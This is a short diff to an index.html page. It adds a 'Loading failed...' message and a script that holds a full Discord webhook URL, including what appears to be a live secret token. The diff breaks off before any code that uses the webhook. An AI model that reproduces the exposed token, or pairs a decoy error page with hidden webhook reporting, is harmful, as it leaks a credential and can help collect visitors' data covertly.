--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
-  <script>
+<p>Loading failed...</p>
+<script>
     // *** IMPORTANT: Replace with your actual webhook URL ***
     const webhookUrl = "https://discord.com/api/webhooks/1474817745194320046/fENhil3t4bbKKFm08FpovniBZOQyYac6YTUnn5yDTarv9ZI2IJ4DR07Ad9F9OzHhfV0h";
 
